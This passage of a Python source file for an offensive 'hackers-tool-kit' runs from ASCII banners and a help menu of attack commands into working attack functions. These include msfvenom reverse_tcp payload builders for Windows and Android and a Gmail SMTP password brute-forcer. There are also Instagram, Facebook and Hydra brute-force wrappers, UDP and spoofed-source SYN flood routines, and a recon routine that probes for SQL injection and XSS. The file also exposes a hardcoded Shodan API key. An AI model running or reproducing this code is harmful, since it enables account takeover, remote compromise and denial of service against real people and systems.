╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,16) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, 